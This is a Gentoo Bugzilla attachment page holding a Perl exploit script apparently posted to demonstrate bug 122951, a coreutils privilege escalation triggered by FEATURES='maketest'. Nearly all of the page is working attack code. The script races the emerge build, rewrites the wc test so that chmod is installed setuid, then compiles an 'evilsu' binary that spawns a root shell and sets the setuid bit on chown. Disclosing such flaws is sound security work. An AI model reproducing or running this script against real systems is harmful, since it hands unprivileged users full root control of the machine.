Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 79866 Details for
Bug 122951
sys-apps/coreutils: privilege escalation with FEATURES="maketest"
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
Automated exploit of privilege escalation vulnerability
coreutils test vulnerability exploit.pl (text/plain), 5.91 KB, created by
Joshua Pettett
on 2006-02-15 12:23:18 UTC
(
hide
)
Description:
Automated exploit of privilege escalation vulnerability
Filename:
MIME Type:
Creator:
Joshua Pettett
Created:
2006-02-15 12:23:18 UTC
Size:
5.91 KB
patch
obsolete
>#!/usr/bin/perl >############################################################################### >#### !!! WARNING !!! WARNING !!! WARNING !!! WARNING !!! WARNING !!! #### >#### #### >#### THIS SCRIPT *WILL* DAMAGE YOUR SYSTEM'S SECURITY AND MAY WREAK HAVOC. #### >#### #### >#### USE ONLY IN AN EXPENDABLE AND EXTERNALLY SECURED EXPERIMENTAL SYSTEM. #### >#### #### >#### CUTVEX v0.1 #### >#### Copyright (C) Joshua Pettett 2006 #### >#### Permission granted to use, modify, and reproduce solely for the #### >#### purpose of diagnosing security vulnerabilities on systems over which #### >#### the user legally has full authority. All other uses are prohibited. #### >############################################################################### ># ># Automated exploit of privilege escalation vulnerability in coreutils emerge with FEATURES="maketest". ># ># Assumes typical system with sandboxing, perl, gcc, etc. Adjust script if needed to fit specific system. ># Also assumes sufficient processor speed (500MHz?). Increase sleep times if script outruns emerge. ># ># Usage: ># 1. As *unprivileged* user run this script: ># ># perl -W coreutils\ test\ vulnerability\ exploit.pl ># ># 2. As *root*, emerge coreutils with FEATURES="maketest": ># ># FEATURES="maketest" emerge --oneshot coreutils ># ># 3. After emerge completes, if "all goes well", the *unprivileged* user will have a *root* shell ># ># ># Of course, this is just one example of the many ways this vulnerability can be exploited. > > ># Make sure these match your system; defaults should work on most systems: > ># Whether or not to attempt to obtain a root shell for unprivileged user. MAY WREAK HAVOC. >$dosu = 1; ># Whether or not to attempt to clean up after ourselves. RESULTS MAY VARY. MAY MAKE THINGS WORSE ON UNUSUAL SYSTEMS. Leaving enabled will sort of mute the emotional effect of the exploit if $dosu = 0 >$revertsystem = 1; ># Adjust this regex to match your system's ps ax output for ebuild process; submatches are version and mode >$ebuildjob = qr'\[coreutils-(.*?)\] sandbox /usr/lib/portage/bin/ebuild.sh (\w+)'; ># Where to put the evilsu binary if $dosu = 1 >$evilsu = glob "~/evilsu"; ># Base directory of portage build files >$builddir = "/var/tmp/portage"; ># Absolute path of chmod and chown binaries (must NOT be symlinks) >$chmod = "/bin/chmod"; >$chown = "/bin/chown"; ># GCC c++ compiler command >$cpp = "g++"; ># Shell (duh? :)) >$shell = "/bin/bash"; > > ># Really exploit >$< or $> or die "Login as a non-root user to see the effects of this exploit.\n"; > ># Give status updates >$| = 1; >print "\033[31;1mWARNING: THIS SCRIPT *WILL* DAMAGE YOUR SYSTEM'S SECURITY AND MAY WREAK HAVOC! You have been warned!\033[37;1m\n"; >print "This entire process may take dozens of minutes, please be patient.\n\n"; >print "Waiting for tests to begin...\n"; > ># Monitor process condition >my $tampered = 0; >while ($_ = `ps ax`) { > sleep 15; # Make sure we don't query (load) or react (race condition) too fast > > # See what we're doing now > if (/$ebuildjob/) { > ($ver, $mode) = ($1, $2); > } else { > $mode = "not running"; > } > > print "Emerge now in '$mode' mode.\n" unless $oldmode and $mode eq $oldmode; > $oldmode = $mode; > > # Before tampering, when emerge enters test mode > if (!$tampered and $mode and $mode eq "test") { > $ver =~ /(^(.+?)(-r\d+)?$)/; > ($ebuildver, $packagever) = ($1, $2); > $packagever = $2; > > # Replace wc test (exploiting last test gives greatest time margin); in theory, we could modify the test, but at this point, who cares if wc doesn't work right :-) > print "\n\aChanging '$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests'\n\n"; > unlink "$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests"; > open TEST, ">$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests"; > > print TEST '#!/bin/bash >perl -e \'$_ = join "", <STDIN>; >s^(.*?\ninstall-exec-local:.*?fi\n)(\n+uninstall-local:.*)^$1\tchmod ug+s \$\(DESTDIR\)\$\(bindir\)/chmod\n$2^s; >print $_\' < ../../src/Makefile > Makefile.new >mv Makefile.new ../../src/Makefile >exit >'; > close TEST; > chmod 0755, "$builddir/coreutils-$ebuildver/work/coreutils-$packagever/tests/wc/wc-tests"; > > print "Waiting for emerge to complete...\n"; > $tampered++; > } > > # After tampering, when emerge ends > if ($tampered and $mode eq 'not running') { > sleep 30; # Give ourselves more time for good measure; ebuild regex stops matching before emerge is complete. > # Check and output the result > print "\n\als says: ".`ls -la $chmod`; > if (`find $chmod -perm -6001`) { > print "Exploit appears to have succeded!\n"; > } else { > die "\nExploit appears to have failed (check that FEATURES=\"maketest\" and that '$chmod' was installed by the latest emerge of coreutils)!\n"; > } > > # Try to make it to a root shell if desired > if ($dosu) { > print "\nAttempting to obtain root shell...\n"; > > # Try to make ourselves a nice evil su > open CPP, "|$cpp -x c++ -o $evilsu -"; > print "\nMaking an \"evilsu\".\n"; > print CPP "#include <unistd.h> >#include <sys/types.h> >#include <stdlib.h> > >int main() { > setuid(0); > system(\"$shell\"); >} >"; > close CPP; > > # Set some permissions > print "Setting some AWFUL permissions. :-D\n"; > `$chmod ug+s $chown`; > `$chown 0:0 $evilsu`; > `$chmod 6755 $evilsu`; > > # And go to town!!! > print "And: "; > `$evilsu`; > > # Clean up if desired > if ($revertsystem) { > unlink $evilsu; > `$chmod ug-s $chown`; > # Will take care of chmod below > } > } > > # Try to remove suid and sgid from chmod if desired > `$chmod ug-s $chmod` if $revertsystem; > > print "\nDone.\nMake sure '$chmod'".($dosu?", '$chown', and '$evilsu' are":'is')." cleaned up!\n"; > > # We're done. > last; > } >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 122951
: 79866